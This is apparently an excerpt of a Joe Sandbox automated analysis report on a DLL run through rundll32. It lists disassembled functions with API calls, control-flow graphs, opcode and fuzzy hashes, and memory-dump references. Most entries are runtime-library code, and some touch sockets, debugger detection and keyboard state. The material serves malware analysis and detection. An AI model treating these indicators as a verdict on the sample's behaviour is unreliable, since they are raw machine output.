                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2001391462-0
                                                                                                          • Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
                                                                                                          • Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 260 1002b0bb-1002b0d3 call 10030535 263 1002b0d5 call 10023b5b 260->263 264 1002b0da-1002b0dd 260->264 263->264 266 1002b115-1002b126 call 1002ac8f 264->266 267 1002b0df-1002b0e7 264->267 276 1002b13b-1002b142 call 1003060d 266->276 277 1002b128-1002b136 call 1002af6b 266->277 269 1002b10a call 1002adac 267->269 270 1002b0e9-1002b108 call 1002aec4 267->270 275 1002b10f-1002b113 269->275 270->263 270->269 275->263 275->266 277->276
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 1002B0C2
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8H_prolog3Throw
                                                                                                          • String ID:
                                                                                                          • API String ID: 3670251406-0
                                                                                                          • Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
                                                                                                          • Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 282 10008000-1000801a call 1002e654 285 10008023-10008037 282->285 286 1000801c-10008021 282->286 288 1000804b-10008052 285->288 287 1000807b-1000807e 286->287 289 10008054-1000805c 288->289 290 1000805e-10008062 call 1002e577 288->290 289->288 293 10008067-10008070 290->293 294 10008072-10008074 293->294 295 10008076 293->295 294->287 295->287
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 1000800B
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 501242067-0
                                                                                                          • Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
                                                                                                          • Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 296 100236ce-100236dc 297 100236e2-100236ed call 1002e654 296->297 298 100236de-100236e0 296->298 301 100236f2-100236f5 297->301 299 10023707-1002370a 298->299 301->298 302 100236f7-10023704 301->302 302->299
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1579825452-0
                                                                                                          • Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
                                                                                                          • Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 303 1002acfb-1002ad0d call 10030568 306 1002ad30-1002ad37 call 1003060d 303->306 307 1002ad0f-1002ad1e call 1002a6ab 303->307 312 1002ad20 call 10024d0b 307->312 313 1002ad25-1002ad2b call 1002a71d 307->313 315 1002ad23 312->315 313->306 315->313
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 1641187343-0
                                                                                                          • Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
                                                                                                          • Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 317 10035645-10035667 HeapCreate 318 1003566b-10035674 317->318 319 10035669-1003566a 317->319
                                                                                                          APIs
                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 10892065-0
                                                                                                          • Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
                                                                                                          • Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10030912, Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _doexit.LIBCMT ref: 10030918
                                                                                                            • Part of subcall function 100307D0: __lock.LIBCMT ref: 100307DE
                                                                                                            • Part of subcall function 100307D0: __decode_pointer.LIBCMT ref: 10030815
                                                                                                            • Part of subcall function 100307D0: __decode_pointer.LIBCMT ref: 1003082A
                                                                                                            • Part of subcall function 100307D0: __decode_pointer.LIBCMT ref: 10030854
                                                                                                            • Part of subcall function 100307D0: __decode_pointer.LIBCMT ref: 1003086A
                                                                                                            • Part of subcall function 100307D0: __decode_pointer.LIBCMT ref: 10030877
                                                                                                            • Part of subcall function 100307D0: __initterm.LIBCMT ref: 100308A6
                                                                                                            • Part of subcall function 100307D0: __initterm.LIBCMT ref: 100308B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1597249276-0
                                                                                                          • Opcode ID: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
                                                                                                          • Instruction ID: c604c62c4e8c1662f3964609c837486d1e59594b357deba72d218edd4804359f
                                                                                                          • Opcode Fuzzy Hash: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
                                                                                                          • Instruction Fuzzy Hash: ADA0026DFD930025F861D1503C53F5421015B50F17FD41050BB093C5C2A4C632584497
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 1003C7D2, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___getlocaleinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1937885557-0
                                                                                                          • Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
                                                                                                          • Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(?,?), ref: 10001194
                                                                                                          • _memset.LIBCMT ref: 100011A8
                                                                                                          • htonl.WS2_32(00000000), ref: 100011C1
                                                                                                          • htons.WS2_32(?), ref: 100011D5
                                                                                                          • socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
                                                                                                          • bind.WS2_32(?,?,00000010), ref: 10001210
                                                                                                          • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1003240404-0
                                                                                                          • Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
                                                                                                          • Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1001DFC0, Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsIconic.USER32 ref: 1001DFE3
                                                                                                            • Part of subcall function 10024266: __EH_prolog3.LIBCMT ref: 1002426D
                                                                                                            • Part of subcall function 10024266: BeginPaint.USER32(?,?,00000004,10022D30,?,00000058,1001E0C9), ref: 10024299
                                                                                                          • SendMessageA.USER32(?,00000027,?,00000000), ref: 1001E031
                                                                                                          • GetSystemMetrics.USER32 ref: 1001E039
                                                                                                          • GetSystemMetrics.USER32 ref: 1001E044
                                                                                                          • GetClientRect.USER32 ref: 1001E05B
                                                                                                          • DrawIcon.USER32 ref: 1001E0AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1007970657-0
                                                                                                          • Opcode ID: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
                                                                                                          • Instruction ID: 44eb2ef316f0b933980e992ec3fa30d6a4f6e9fba2b57c8abd37e2d05c6bd9c1
                                                                                                          • Opcode Fuzzy Hash: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
                                                                                                          • Instruction Fuzzy Hash: 4A31EA75A00119DFDB24CFA8C985FAEBBB5FB48300F108299E549E7241DA30AE84DF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _strcpy_s.LIBCMT ref: 100212CD
                                                                                                            • Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                            • Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88
                                                                                                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
                                                                                                          • __snwprintf_s.LIBCMT ref: 1002131A
                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 10021355
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
                                                                                                          • String ID: LOC
                                                                                                          • API String ID: 1016519223-519433814
                                                                                                          • Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
                                                                                                          • Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002DB0D, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 10031D3A
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
                                                                                                          • UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 10031D7D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2579439406-0
                                                                                                          • Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
                                                                                                          • Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027958, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          • GetKeyState.USER32(00000010), ref: 1002797E
                                                                                                          • GetKeyState.USER32(00000011), ref: 10027987
                                                                                                          • GetKeyState.USER32(00000012), ref: 10027990
                                                                                                          • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 100279A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1063413437-0
                                                                                                          • Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
                                                                                                          • Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0
                                                                                                          Uniqueness

